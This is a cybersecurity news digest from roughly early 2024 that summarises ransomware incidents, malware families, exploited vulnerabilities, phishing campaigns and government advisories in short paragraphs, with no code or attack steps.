Lockbit's Seized Site Comes Alive to Tease New Police Announcements

Law enforcement agencies collaborated in a significant operation named Operation Cronos. This operation successfully dismantled the infrastructure of the LockBit ransomware group on February 19th. It involved seizing 34 servers that hosted the data leak website, along with data stolen from victims, cryptocurrency addresses, 1,000 decryption keys, and the affiliate panel used by LockBit.

New 'Cuckoo' Persistent macOS Spyware Targeting Intel and Arm Macs

The discovery of Cuckoo highlights the ongoing arms race between cybersecurity researchers and malicious actors. This malware's sophistication, from its ability to evade detection to its multifaceted information-gathering capabilities, showcases the level of expertise adversaries have attained in crafting highly effective threats.

Hackers Target New NATO Member Sweden with Surge of DDoS Attacks

According to metrics collected by network performance management provider Netscout, distributed denial of service attacks (DDoS) targeting Sweden surged in volume between 2023 and 2024 as the country was in the process of joining NATO. Netscout notes that DDoS attacks against Swedish organizations started picking up significantly in late 2023 with 730 Gbps attacks.

Top Threat Actors, Malware, Vulnerabilities and Exploits

The recent report from Picussecurity outlines threats, malware, vulnerabilities, and exploits for the first week of May. Critical vulnerabilities, including CVE-2024-27322 in R Programming Language and three in Judge0, pose significant risks. Malware activities involve Wpeeper Android malware utilizing compromised WordPress sites and the Dev Popper campaign targeting developers with a Python RAT.

Senators Reprimand UnitedHealth CEO in Ransomware Hearing

During a government hearing on Wednesday, senators strongly criticized UnitedHealth Group CEO Andrew Witty for the organization's inadequate security measures leading up to the February ransomware attack on Change Healthcare, a subsidiary. Witty confirmed a $22 million ransom payment and acknowledged potential data theft affecting one-third of Americans.

New "Goldoon" Botnet Targets D-Link Routers With Decade-Old Flaw

A newly discovered botnet named Goldoon has emerged, specifically targeting D-Link routers by exploiting a critical security flaw known as CVE-2015-2051. This flaw, with a high CVSS score of 9.8, impacts D-Link DIR-645 routers, allowing malicious actors to execute arbitrary commands remotely via specially crafted HTTP requests.

New Cuttlefish Malware Infects Routers to Monitor Traffic For Credentials

Lumen Technologies' Black Lotus Labs has uncovered a new malware dubbed 'Cuttlefish' that has been observed infecting enterprise-grade and small office/home office routers to monitor data passing through them and steal authentication information. The malware supports various router architectures with builds for ARM, i386, i386_i686, i386_x64, mips32, and mips64.

Food and Ag-ISAC Alert: Pro-Russian Hacktivists Targeting HMI Vulnerabilities in OT Networks

Threat actors continue to target operational technology as a means to disrupt critical infrastructure networks, or to deliver malware as a just-in-case measure for escalating global conflicts. Earlier this year we reported on IRGC-affiliated cyber actors targeting Israeli-produced programmable logic controllers (PLCs) to disrupt the water sector. We also highlighted reports of Chinese (PRC) state-sponsored actors compromising and maintaining persistent access to U.S. critical infrastructure with strategic and destructive malware.

Kapeka: A New Toolkit in the Arsenal of SandStorm

Kapeka, also known as KnuckleTouch, emerged around mid-2022 but gained formal tracking in 2024 due to its involvement in limited-scope attacks, notably in Eastern Europe. It's associated with the Sandstorm Group, operated by Russia's Military Unit 74455, known for disruptive cyber activities, particularly targeting Ukraine's critical infrastructure.

New Latrodectus Malware Attacks Use Microsoft, Cloudflare Themes

Latrodectus, also known as Unidentified 111 and IceNova, is a Windows malware downloader that acts as a backdoor, allowing threat actors to gain unauthorized access to compromised systems. The malware was initially discovered by Walmart's security team and later analyzed by cybersecurity firms such as ProofPoint and Team Cymru.

Threat Actor Profile: SideCopy

Operation SideCopy is a sophisticated cyber operation originating from Pakistan and primarily targeting Indian defense forces and personnel. Since its inception in early 2019, the threat group has demonstrated a high level of adaptability, continuously evolving its malware modules to avoid detection and maintain operational effectiveness. Notably, SideCopy closely monitors antivirus detections and promptly updates its modules in response.

China-Linked 'Muddling Meerkat' Hijacks DNS to Map Internet on Global Scale

A newly discovered cyber threat known as Muddling Meerkat has been actively engaging in sophisticated DNS activities since October 2019. This threat is believed to have affiliations with the People's Republic of China due to its utilization of DNS open resolvers from Chinese IP space and its potential control over the Great Firewall, which is known for censoring internet access and manipulating internet traffic in and out of China.

Over 1,400 CrushFTP Servers Vulnerable To Actively Exploited Bug

Last Friday, CrushFTP disclosed details of a critical-severity server-side template injection vulnerability in its file transfer software that is being actively exploited in attacks in the wild. Tracked as CVE-2024-4040, the flaw could enable actors to perform a virtual file system escape to read any file on the server's file system, gain administrative privileges, and perform remote code execution to effectively compromise unpatched systems.

Palo Alto Networks Outlines Remediation for Critical PAN-OS Flaw Under Attack

Palo Alto Networks has issued remediation guidance for a critical security flaw, CVE-2024-3400, impacting PAN-OS, which is actively being exploited. This flaw allows unauthenticated remote shell command execution and has been observed in multiple versions of PAN-OS. Dubbed "Operation MidnightEclipse," the exploit involves dropping a Python-based backdoor named UPSTYLE, enabling execution of commands through crafted requests.

CISA: Cisco and CrushFTP Vulnerabilities Need Urgent Patches

The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent directive for federal civilian agencies to patch three critical vulnerabilities within a week. These vulnerabilities include two affecting Cisco products (CVE-2024-20353 and CVE-2024-20359) and one impacting CrushFTP, a popular file transfer tool. The exploits are being actively utilized by state-sponsored threat actors, posing significant risks to network security.

Nespresso Domain Hijacked in Phishing Attack Targeting Microsoft Logins

Perception Point researchers have identified a new phishing campaign utilizing compromised accounts to target users through an open redirect vulnerability discovered within a Nespresso domain. Nespresso is a coffee manufacturer. This redirect method allows attackers to bypass standard endpoint detection security measures, assuming that these measures do not check for hidden or embedded links.

Autodesk Hosting PDF Files Used in Microsoft Phishing Attacks

A campaign has been uncovered by researchers at Netcraft, where actors are using compromised email accounts to send phishing emails to existing contacts. These emails contain shortened URL links (generated using the autode[.]sk URL shortener) that lead to malicious PDF documents hosted on Autodesk Drive, a data-sharing platform.

Advanced Cyber Threats Impact Even the Most Prepared

This blog post from MITRE highlights a recent cyber intrusion they experienced, emphasizing the evolving tactics of foreign nation-state cyber adversaries. The breach, discovered in April 2024, involved the exploitation of zero-day vulnerabilities in Ivanti Connect Secure VPNs and subsequent lateral movement into their VMware infrastructure.

DPRK Hacking Groups Breach South Korean Defense Contractors

The National Police Agency in South Korea has issued an urgent warning regarding ongoing cyberattacks targeting defense industry entities by North Korean hacking groups. The police discovered several instances of successful breaches involving the hacking groups Lazarus, Andariel, and Kimsuky, all linked to the North Korean hacking apparatus.

LOCKBIT Black's Legacy: Unraveling the DragonForce Ransomware Connection

Key takeaways from the Cyble Research & Intelligence Labs (CRIL) report on DragonForce ransomware reveal significant insights. CRIL identified DragonForce ransomware as being based on LOCKBIT Black ransomware, suggesting that the threat actors behind DragonForce utilized a leaked builder of LOCKBIT Black to generate their binary. This discovery was made after an X user shared the download link for the LockBit ransomware builder in September 2022. DragonForce ransomware surfaced in November 2023, employing double extortion tactics and targeting victims worldwide.

Hackers Hijack Antivirus Updates to Drop Guptiminer Malware

GuptiMiner, a malware tool reportedly used by North Korean hackers, has recently come into the spotlight due to its sophisticated capabilities and the manner in which it has been deployed. The attack vector involves exploiting vulnerabilities in the update mechanism of eScan antivirus software, allowing the attackers to plant backdoors and deploy cryptocurrency miners on targeted networks.

Ransomware Double-Dip: Re-Victimization in Cyber Extortion

In the realm of cyber extortion, re-victimization often stems from a combination of desperation and strategic maneuvering by threat actors. For instance, repeat attacks against victims may exploit persistent vulnerabilities that were not adequately addressed or leverage new entry points, such as phishing campaigns or compromises in third-party services.

Cybercriminals Pose as LastPass Staff to Hack Password Vaults

LastPass has disclosed details of a campaign targeting its customers using the CryptoChameleon phishing kit. CryptoChameleon is a phishing-as-a-service that enables threat actors to easily generate fake SSO or other login sites impersonating the legitimate sites of companies to steal credentials and other information that can be used for authentication.

Quishing Attacks Jump Tenfold, Attachment Payloads Halve

Quishing attacks, a type of phishing that exploits QR codes, have seen a significant rise from 0.8% in 2021 to 10.8% in 2024, according to the latest findings from Egress. At the same time, the report notes a substantial decline in attachment-based payloads, which decreased by half from 72.7% to 35.7%. Impersonation attacks continue to be a prevalent threat, with 77% of them masquerading as well-known brands such as DocuSign and Microsoft.

Ransomware Victims Who Pay a Ransom Drops to Record Low

The latest trends in ransomware paint a complex picture of evolving dynamics within the cybercriminal ecosystem. Coverware's report highlights a notable decrease in ransom payments, with only 28% of victims opting to pay in the first quarter of 2024, marking a significant drop from previous periods. This shift is attributed to improved resilience among businesses, allowing them to recover from attacks without succumbing to ransom demands.

Hackers Target Middle East Governments with Evasive "CR4T" Backdoor

In February 2024, Kaspersky discovered a new malware campaign targeting government entities in the Middle East that actively employs over 30 DuneQuixote dropper samples. The droppers take one of two forms: a regular malware dropper, or a tampered copy of the legitimate tool "Total Commander". Both carry malicious code that downloads additional malware through a backdoor Kaspersky has named "CR4T".

FIN7 Targets American Automaker's IT Staff In Phishing Attacks

Researchers at BlackBerry have disclosed details of a spear-phishing campaign identified in late 2023 that targeted a large automotive manufacturer based in the United States. The campaign has been attributed to a financially motivated threat actor called FIN7 and was initiated with spear-phishing emails targeting highly privileged employees in the IT department of the unnamed U.S.-based manufacturer.

Hackers Hijack OpenMetadata Apps in Kubernetes Cryptomining Attacks

Security researchers at Microsoft recently discovered a malware campaign exploiting new critical vulnerabilities in OpenMetadata to compromise Kubernetes environments, gain access to Kubernetes workloads and abuse them for malicious cryptomining activity. OpenMetadata is an open-source platform designed to manage metadata across various data sources. It serves as a central repository for users to discover, understand, and govern their data.

#StopRansomware: Akira Ransomware

This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors.

Critical Atlassian Flaw Exploited to Deploy Linux Variant of Cerber Ransomware

Threat actors are actively targeting unpatched Atlassian servers using a critical security vulnerability known as CVE-2023-22518, which has a CVSS score of 9.1. This vulnerability affects the Atlassian Confluence Data Center and Server, allowing attackers to reset Confluence and create an administrator account without authentication. Once they gain this level of access, threat actors can assume control of the affected systems.

Cisco Duo Warns Third-Party Data Breach Exposed SMS MFA Logs

Cisco Duo recently sent out a notice warning that some of its customers' VoIP and SMS logs for multi-factor authentication messages were stolen by hackers in a cyberattack on the vendor's telephony provider. According to Cisco Duo, an unnamed provider that handles the company's SMS and VoIP multi-factor authentication messages was compromised on April 1, 2024. In this case, the actor was able to obtain employee credentials via a phishing attack, which were then used to gain access to the telephony provider's systems.

PuTTY SSH Client Flaw Allows Recovery of Cryptographic Private Keys

The discovery of CVE-2024-31497 in PuTTY versions 0.68 through 0.80 unveils a critical vulnerability that exposes cryptographic private keys to potential recovery by attackers. This flaw stems from PuTTY's method of generating ECDSA nonces, introducing a bias that weakens the security of private key generation, particularly on the NIST P-521 curve.

Open Source Leaders Warn of XZ Utils-Like Takeover Attempts

The OpenSSF and OpenJS Foundations have issued a warning to open source maintainers regarding a series of social engineering attacks reminiscent of the xz Utils campaign. These attacks involve suspicious emails sent to the OpenJS Foundation Cross Project Council, requesting urgent updates to popular JavaScript projects under the pretext of addressing critical vulnerabilities.

Cybersecurity Pros Urge US Congress to Help NIST Restore NVD Operation

Professionals in the vulnerability management community warned that the lasting issues of the US National Vulnerability Database (NVD) could lead to a major supply chain security crisis. 50 cybersecurity professionals joined together to sign and send an open letter on April 12th to several members of the US Congress, including the Secretary of Commerce, which addressed the ongoing issues with NVD.

7 Top IT Challenges in 2024

In recent years, AI, cybersecurity, and digital transformation have emerged as pivotal themes shaping the landscape of IT. Organizations must stay ahead of the curve, understanding the evolving dynamics, reasons behind them, and how to adapt.

AT&T Data Breach: Impact Extends to 51 Million Customers

AT&T has confirmed a data breach impacting 51 million former and current customers, after previously denying ownership of the leaked data. The breach, initially reported in 2021 by threat actor ShinyHunters and later by 'MajorNelson', exposed personal information including names, email addresses, phone numbers, social security numbers, and AT&T account details. Although AT&T claims no financial data or call history was compromised, the breach still poses significant risks to affected individuals.

From PDFs to Payload: Bogus Adobe Acrobat Reader Installers Distribute Byakugan Malware

A new malware variant known as Byakugan is being distributed through fake Adobe Reader installers. This malicious campaign was initially uncovered by AhnLab Security Intelligence researchers and further analyzed by Fortinet FortiGuard Labs. The attack begins with a PDF file written in Portuguese, which, upon opening, displays a blurred image and prompts the user to click on a link to download the Adobe Reader application to view the content.

RDP Abuse Present in 90% of Ransomware Breaches

Researchers at Sophos have observed a significant rise in Remote Desktop Protocol exploitation within ransomware attacks, based on their analysis of 150 incident response cases from 2023. They found that RDP abuse featured in a staggering 90% of these cases, allowing threat actors to gain unauthorized remote access to Windows environments.

AI Hallucinated Packages Fool Unsuspecting Developers

A recent report from Lasso Security has raised concerns about software developers potentially using nonexistent or hallucinated software packages when relying on chatbots to build applications. The report, based on continued research by Bar Lanyado from Lasso, builds upon previous findings that demonstrated how large language models can inadvertently recommend packages that do not actually exist.

Indian Government Rescues 250 Citizens Forced into Cybercrime in Cambodia

The Indian government has confirmed that it has rescued and repatriated around 250 Indian citizens who were held captive in Cambodia and coerced into executing cyber scams that target people in India. These victims of human trafficking were carefully lured by crime racket agents under the guise of employment opportunities, but these victims were forced into “cyber slavery” instead.

Inc Ransom Claims to Be Behind 'Cyber Incident' at UK City Council

The cybercriminal group INC Ransom has claimed responsibility for the ongoing cybersecurity incident at Leicester City Council, marking the first involvement of an established cybercrime gang in the local authority's IT troubles. According to a post on INC Ransom's leak blog, they assert having stolen 3 TB of council data before deleting it shortly after publication.

AT&T Resets Passcodes for 7.6 Million Customers Following Dark Web Data Leak

AT&T has reset passcodes for 7.6 million current customers and 65.4 million former subscribers following a data leak discovered on the dark web. The leaked information, dating back to 2019 and earlier, varies in content, potentially including full names, email addresses, mailing addresses, phone numbers, social security numbers, dates of birth, and AT&T account numbers.

Exposing a New BOLA Vulnerability in Grafana

Palo Alto Networks' Unit 42 researchers uncovered and disclosed a new Broken Object Level Authorization (BOLA) vulnerability that affects Grafana versions from 9.5.0 to 9.5.18, from 10.0.0 to 10.0.13, from 10.1.0 to 10.1.9, from 10.2.0 to 10.2.6, and from 10.3.0 to 10.3.5. Grafana is an established open-source data visualization and monitoring solution with almost 60,000 stars on GitHub that helps organizations drive business processes.

DinodasRAT Linux Implant Targeting Entities Worldwide

Kaspersky has disclosed details of a new Linux version of DinodasRAT that it discovered in early October 2023 after a publication from ESET. Also known as XDealer, the trojan is a multi-backdoor written in C++ that enables actors to surveil and harvest sensitive data from targeted systems.

Hackers Developing Malicious LLMs After WormGPT Falls Flat

Researchers have noted that cybercriminals are increasingly interested in developing malicious large language models due to the limitations of existing tools like WormGPT. Ransomware and malware operators are also showing interest in this trend. The demand for AI talent has risen as previous tools like WormGPT failed to meet cybercriminals' needs.

Agent Tesla's New Ride: The Rise of a Novel Loader

SpiderLabs has disclosed details of a new campaign that utilized a novel loader to ultimately deploy Agent Tesla on targeted systems. Researchers note that they identified a phishing email on March 8, 2024, which contained a seemingly harmless archive masquerading as a legitimate payment receipt from a bank.

Street Newspaper Appears to Have Big Issue with Qilin Ransomware Gang

The parent company of The Big Issue, a renowned street newspaper supporting homeless people, is facing a cybersecurity crisis initiated by the Qilin ransomware gang. The gang has claimed to have stolen 550 GB of sensitive company data, including personal information like driving licenses, salary details of executives, and even passport and bank details of key figures within the organization.

Sketchy NuGet Package Likely Linked to Industrial Espionage Targets Developers

Threat hunters have identified a potentially nefarious package named SqzrFramework480 within the NuGet package manager. This package is suspected to target developers using tools from a Chinese industrial technology firm known for manufacturing industrial and digital equipment. The package, uploaded by a user named "zhaoyushun1999," contains a DLL file named "SqzrFramework480[.]dll" that exhibits several concerning behaviors.

N. Korea-linked Kimsuky Shifts to Compiled HTML Help Files in Ongoing Cyberattacks

The North Korea-linked threat actor known as Kimsuky (aka Black Banshee, Emerald Sleet, or Springtail) has been observed shifting its tactics, leveraging CHM files as attack vectors in the delivery phase to deploy malware for harvesting sensitive data. Kimsuky has been active for over 10 years and is notorious for targeting entities in South Korea, North America, Europe, and Asia, gathering intelligence relative to North Korea's interests.

Russian Hackers Using TinyTurla-NG to Breach European NGO's Systems

Cisco Talos has provided updated details on a new campaign where the Russian espionage group Turla deployed their custom backdoor dubbed TinyTurla-NG to infect multiple systems in the compromised network of a European non-government organization (NGO). While it's unclear how exactly the group gained initial access, Turla in the past has initiated drive-by compromises and employed phishing lures to obtain a foothold into victim environments.

Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect

Mandiant's investigation reveals a sophisticated cyber threat campaign attributed to a Chinese threat actor group named UNC5174, also known by the alias "Uteus." The group employs a combination of novel and known vulnerabilities to target a wide range of organizations globally, including U.S. defense contractors, government entities, research institutions, and NGOs.

Ivanti Releases Urgent Fix for Critical Sentry RCE Vulnerability

Ivanti has revealed a critical remote code execution vulnerability affecting Standalone Sentry and has urged customers to promptly apply the available patches for protection against potential cyber threats. Tracked as CVE-2023-41724 with a CVSS score of 9.6, this flaw allows unauthenticated attackers to execute arbitrary commands on the appliance's operating system within the same network.

New 'Loop DoS' Attack May Impact up to 300,000 Online Systems

Researchers at the CISPA Helmholtz Center for Information Security have discovered a new denial-of-service attack known as 'Loop DoS', which targets application layer protocols and exploits a weakness in the User Datagram Protocol (UDP). This attack can cause an indefinite communication loop between network services, resulting in a significant increase in traffic.

AndroxGh0st Malware Targets Laravel Apps to Steal Cloud Credentials

Juniper Threat Labs has released details on a Python-based tool, dubbed AndroxGh0st, designed to target Laravel applications and steal sensitive data. Laravel is an open-source PHP web application development framework that is used for designing web applications such as e-commerce platforms, APIs, content management systems, etc.

New AcidPour Data Wiper Targets Linux x86 Network Devices

SentinelLabs security researcher Tom Hegel has spotted a new destructive malware dubbed AcidPour, which seems to be a variant of the AcidRain data wiper that was used to target satellite communications provider Viasat back in 2022. In a series of threads on X (formerly known as Twitter), Juan Andrés Guerrero-Saade, AVP of Research for SentinelLabs, provided details regarding the new data wiper, noting that it is designed to target Linux x86 IoT and networking devices.

Chinese Earth Krahang Hackers Breach 70 Orgs in 23 Countries

Trend Micro has released details surrounding a campaign that has been ongoing since early 2022. The campaign has been attributed to a Chinese APT group dubbed 'Earth Krahang,' who according to researchers has breached 70 organizations and targeted at least 116 entities across 45 countries since initiating operations.

'Conversation Overflow' Cyberattacks Bypass AI Security to Target Execs

A novel cyberattack method called "Conversation Overflow" has recently surfaced, showcasing cybercriminals' attempts to bypass AI- and ML-enabled security platforms through sophisticated techniques. This attack tactic, analyzed by SlashNext researchers, is observed in multiple incidents, indicating a deliberate effort to evade advanced cybersecurity defenses.

Malware Analysis Report

The report provides an analysis of a njRAT (Remote Access Trojan) sample discovered in October 2023. The malware, written in .NET, allows attackers to remotely control infected machines. Basic static analysis reveals key file information and suspicious strings indicating registry manipulation, network communication, and process control.

Kaspersky Reports Phishing Attacks Grew By 40 Percent in 2023

A new report from Kaspersky noted that its anti-phishing system was able to deter over 709 million attempts to access phishing and scam websites in 2023, highlighting a 40 percent increase over 2022. A spike in phishing activity was observed between May and June, where actors used travel-related lures including counterfeit airline tickets and fake hotel deals to gain potential victims.

Increase in the Number of Phishing Messages Pointing to IPFS and to R2 Buckets

Credential-stealing phishing remains a persistent threat, with threat actors continually evolving their tactics. While various methods for hosting phishing pages exist, including third-party services and email attachments, traditional approaches involving internet-connected servers remain common. A recent trend observed involves an increase in phishing campaigns utilizing IPFS (InterPlanetary File System) and R2 buckets, a Cloudflare object storage service, to host malicious content.

McDonald's IT Systems Outage Impacts Restaurants Worldwide

The recent global IT outages experienced by McDonald's restaurants have caused significant disruptions to operations across multiple countries. These outages, which commenced overnight, have led to widespread difficulties in order-taking and payment processing, prompting some stores to close temporarily.

Third-Party ChatGPT Plugins Could Lead to Account Takeovers

Researchers have discovered vulnerabilities in third-party plugins for OpenAI's ChatGPT, which could be exploited by attackers to gain unauthorized access to sensitive data. Salt Labs published research revealing security flaws in ChatGPT and its ecosystem, allowing attackers to install malicious plugins without user consent and take over accounts on platforms like GitHub.

Ande Loader Malware Targets Manufacturing Sector in North America

Blind Eagle, also known as APT-C-36, has been observed utilizing a loader malware named Ande Loader to distribute remote access trojans (RATs) like Remcos RAT and NjRAT. The attacks primarily target Spanish-speaking users in the manufacturing industry based in North America. These malicious activities are executed through phishing emails containing RAR and BZ2 archives, serving as the initial vectors of infection.

US Govt Probes if Ransomware Gang Stole Change Healthcare Data

The U.S. Department of Health and Human Services is investigating whether protected health information was stolen in a ransomware attack that hit UnitedHealthcare Group (UHG) subsidiary Optum, which operates the Change Healthcare platform, in late February. This investigation is coordinated by HHS' Office for Civil Rights (OCR), which enforces the Health Insurance Portability and Accountability Act (HIPAA) rules that protect patients' health information from being disclosed without their knowledge or consent.

What a Cluster: Local Volumes Vulnerability in Kubernetes

A high-severity vulnerability, CVE-2023-5528, with a CVSS score of 7.2, has been discovered by Akamai security researcher Tomer Peled in Kubernetes. This vulnerability allows remote code execution with SYSTEM privileges on all Windows endpoints within a Kubernetes cluster, posing a significant threat. It can be exploited via malicious YAML files, potentially leading to full takeover of Windows nodes.

Russia's Foreign Intelligence Service Alleges US Is Plotting to Interfere in Presidential Election

Russia's Foreign Intelligence Service (SVR) alleges that the US is plotting to interfere in its upcoming presidential election scheduled this month. According to SVR, US nation-state actors plan to launch cyber attacks against Russian voting systems to disrupt operations and interfere with the vote-counting process, as reported by Reuters. “According to information received by the Foreign Intelligence Service of the Russian Federation, the administration of J. Biden is setting a task for American NGOs to achieve a decrease in turnout,” reads a statement issued by the SVR and reported by Reuters.

Alert: Cybercriminals Deploying VCURMS and STRRAT Trojans via AWS and GitHub

A recent phishing scheme has been detected distributing remote access trojans like VCURMS and STRRAT through a malicious Java-based downloader. The attackers utilized public services like AWS and GitHub to host malware, employing a commercial protector to evade detection. An unusual element of the campaign is VCURMS' use of a Proton Mail email address for communication with a C2 server.

Cloud Account Attacks Surged 16-Fold in 2023

According to Red Canary's 2024 Threat Detection Report, cloud account threats surged by 16 times in 2023, with attackers adopting new strategies tailored for cloud environments. Attacks exploiting T1078.004: Cloud Accounts, a technique outlined by MITRE ATT&CK for cloud account compromises, rose to become the fourth most prevalent method used by threat actors, a significant increase from its 46th position in 2022.

Secure Cloud Business Applications: Hybrid Identity Solutions Guidance

Identity management for a traditional on-premises enterprise network is usually handled by an on-premises directory service (e.g., Active Directory). When organizations leverage cloud solutions and attempt to integrate them with their on-premises systems (creating a “hybrid” environment), identity management can become significantly more complex.

Over 12 Million Auth Secrets and Keys Leaked on GitHub in 2023

A new report from GitGuardian notes that GitHub users accidentally leaked 12.8 million authentication and sensitive secrets during 2023, highlighting a 28 percent increase over the previous year. The IT sector accounted for the most secrets leaked (65.9%), followed by education, science, retail, manufacturing, etc. T

Ransomware: Attacks Continue to Rise as Operators Adapt to Disruption

Despite a decrease in the number of publicly claimed ransomware attacks, ransomware activity remains a significant threat, with attackers adapting to disruption and refining their tactics. Vulnerability exploitation has emerged as the primary infection vector, with attackers targeting known vulnerabilities in public-facing applications. LockBit, Noberus, and Clop are among the most prolific ransomware operations, with LockBit being the largest threat, followed by Noberus and Clop.

Typosquatting Wave Shows No Signs of Abating

In the ever-evolving landscape of cybersecurity threats, one tactic stands out for its enduring effectiveness: typosquatting. Since the dawn of the commercial internet, threat actors have leveraged this deceptive strategy to impersonate legitimate businesses, exploiting users' inattention and human errors to propagate malware, steal data, and pilfer funds.

Three-Quarters of Cyber Incident Victims Are Small Businesses

A new report from Sophos highlighted that over three-quarters of cyber incidents in 2023 impacted small businesses. Ransomware in particular made up a good chunk of these incidents, with groups like LockBit, Akira, BlackCat, and Play at the forefront of the attacks observed against small businesses. Sophos notes that tactics employed by ransomware groups evolved as 2023 progressed, including the use of remote encryption, where these actors have been observed abusing unmanaged devices on organizations' networks to attempt to encrypt files on other systems via network file access.

Researchers Expose Microsoft SCCM Misconfigurations Usable in Cyberattacks

Security researchers have created a knowledge base repository for attack and defense techniques based on improperly setting up Microsoft's Configuration Manager, which could allow an attacker to execute payloads or become a domain controller. Configuration Manager (MCM), formerly known as System Center Configuration Manager (SCCM, ConfigMgr), has been around since 1994 and is present in many Active Directory environments, helping administrators manage servers and workstations on a Windows network.

Magnet Goblin Hackers Use 1-Day Flaws to Drop Custom Linux Malware

A financially motivated hacking group exploits newly disclosed 1-day vulnerabilities to infiltrate public-facing servers, deploying custom malware on both Windows and Linux systems. These vulnerabilities, publicly disclosed but not yet patched, are swiftly leveraged by threat actors before security updates can be applied. Analysts identified rapid exploitation of these vulnerabilities, sometimes within a day of a proof of concept exploit being released.

NSA Launches Top 10 Cloud Security Mitigation Strategies

As businesses transition towards hybrid and multi-cloud environments, the prevalence of cloud misconfigurations and security vulnerabilities has emerged as a significant concern. Cyber threat actors are capitalizing on these vulnerabilities, targeting misconfigured or inadequately secured cloud systems.

Dropbox Used to Steal Credentials and Bypass MFA in Novel Phishing Campaign

Security company Darktrace shared details around a new phishing campaign leveraging legitimate Dropbox infrastructure to bypass multi-factor authentication (MFA). Darktrace notes in their report that while it is common for attackers to exploit the trust of users by mimicking common services, this campaign took things a step further and actually used the legitimate cloud storage platform.

Switzerland: Play Ransomware Leaked 65,000 Government Documents

Switzerland's National Cyber Security Centre (NCSC) has released details surrounding a ransomware attack on Xplain which impacted thousands of sensitive government files. Xplain is a Swiss technology and software solutions company, which supports various government departments, administrative units, and even the country's military.

'The Weirdest Trend in Cybersecurity': Nation-States Returning to USBs

During a keynote presentation this week at CPX 2024 in Las Vegas, the vice president of research at Check Point, Maya Horowitz, highlighted the resurgence of USBs used by nation-state actors to compromise highly secured government organizations and critical infrastructure facilities. According to Horowitz, three major threat groups employed USBs as their primary initial infection vector in 2023: Chinese nation-state group Mustang Panda, Russian APT group Gamaredon, and the actors behind the Raspberry Robin worm.

NSA's Zero-Trust Guidelines Focus on Segmentation

The US National Security Agency (NSA) has released guidelines for zero-trust network security, aiming to provide a structured approach towards its adoption. Despite the increasing recognition of zero trust as a vital security strategy, its implementation remains slow, necessitating clear guidance and support.

New Python-Based Snake Info Stealer Spreading Through Facebook Messages

Facebook messages are being used by threat actors to deliver a Python-based information stealer dubbed Snake that's designed to capture credentials and other sensitive data. "The credentials harvested from unsuspecting users are transmitted to different platforms such as Discord, GitHub, and Telegram," Cybereason researcher Kotaro Ogino said in a technical report.

FBI Releases 2023 Internet Crime Report

The report issued on March 6, 2024, highlights the escalating cybercrime landscape in the United States, with a record number of complaints received by the Internet Crime Complaint Center (IC3) in 2023. Key points include a substantial increase in financial losses, with investment fraud, Business Email Compromise (BEC), and ransomware standing out as significant threats.

Critical TeamCity Bugs Endanger Software Supply Chain

Critical vulnerabilities have been uncovered in the on-premises deployments of JetBrains TeamCity, a widely used Continuous Integration/Continuous Deployment (CI/CD) pipeline tool. These vulnerabilities, known as CVE-2024-27198 and CVE-2024-27199, pose significant risks as they could enable threat actors to gain administrative control over TeamCity servers.

ScreenConnect Flaws Exploited to Drop New ToddlerShark Malware

Late last month, ConnectWise addressed two flaws impacting its remote access software ScreenConnect, which could be exploited by actors to bypass authentication (CVE-2024-1709) and execute code remotely (CVE-2024-1708). Since then, several threat actors have abused the flaws, particularly CVE-2024-1709, in the wild to deploy various payloads including ransomware (Black Basta, Bl00dy, LockBit), remote access trojans, info stealers, and much more.

Stealthy GTPDOOR Linux Malware Targets Mobile Operator Networks

Security researcher HaxRob discovered a previously unknown Linux backdoor named GTPDOOR, designed for covert operations within mobile carrier networks. The threat actors behind GTPDOOR are believed to target systems adjacent to the GPRS roaming eXchange (GRX), such as SGSN, GGSN, and P-GW, which can provide the attackers direct access to a telecom's core network.

Content Farm Impersonates 60+ Major News Outlets

Researchers at Bleeping Computer have discovered a content farm that masquerades as reputable news sources, including a couple major news outlets. These sites plagiarize articles without attribution, essentially stealing content from credible news organizations and research institutes.

TA577 Exploits NTLM Authentication Vulnerability

Proofpoint cybersecurity researchers have uncovered a new tactic employed by cybercriminal threat actor TA577, revealing a previously unseen objective in their operations. The group was found using an attack chain aimed at stealing NT LAN Manager (NTLM) authentication information, which could potentially be used for sensitive data gathering and further malicious activities.

BlackCat Ransomware Turns off Servers Amid Claim They Stole $22 Million Ransom

BleepingComputer has uncovered new developments regarding the ALPHV/BlackCat ransomware gang's activities. According to reports, the gang has taken the drastic step of shutting down its servers amidst accusations of defrauding an affiliate out of a staggering $22 million. This affiliate is believed to have been responsible for the attack on Optum's Change Healthcare platform.

Hackers Stole ‘Sensitive' Data From Taiwan Telecom Giant: Ministry

Last Friday, Taiwan's Ministry of National Defense confirmed an attack on the country's largest telecom company, Chunghwa Telecom, enabling hackers to steal sensitive information including military and government contracts. The actors have advertised the stolen data on the dark web, claiming to have exfiltrated 1.7 TB of data from Chunghwa Telecom.

Five Eyes Warn of Ivanti Vulnerabilities Exploitation, Detection Tools Insufficient

On February 29, government agencies from the Five Eyes countries, comprising Australia, Canada, New Zealand, the UK, and the US, issued an urgent warning regarding the active exploitation of vulnerabilities found in Ivanti products. These vulnerabilities, which include CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893, affect all supported versions of Ivanti gateways, spanning from 9.x to 22.x.

Cybercriminals Harness AI for New Era of Malware Development

Observations made by researchers at Group-IB showcase cybercriminals increasingly harnessing the power of artificial intelligence to develop more advanced and potent malware, as evidenced by the escalating number of ransomware attacks and the collaborative efforts between ransomware groups and initial access brokers.

New Phishing Kit Leverages SMS, Voice Calls to Target Cryptocurrency Users

A new phishing kit has emerged, targeting cryptocurrency users by impersonating login pages of prominent cryptocurrency services, with a focus on mobile devices. The kit allows attackers to create fake single sign-on (SSO) pages, using a combination of email, SMS, and voice phishing to deceive victims into divulging sensitive information, including usernames, passwords, and even photo IDs.

'Savvy Seahorse' Hackers Debut Novel DNS CNAME Trick

A newly discovered threat actor, known as Savvy Seahorse, is orchestrating an investment scam by leveraging a sophisticated traffic distribution system (TDS) that exploits the Domain Name System (DNS). Savvy Seahorse impersonates reputable brands like Meta and Tesla through Facebook ads in multiple languages, enticing victims to create accounts on a fake investing platform.

Cybersecurity Agencies Warn Ubiquiti EdgeRouter Users of APT28's MooBot Threat

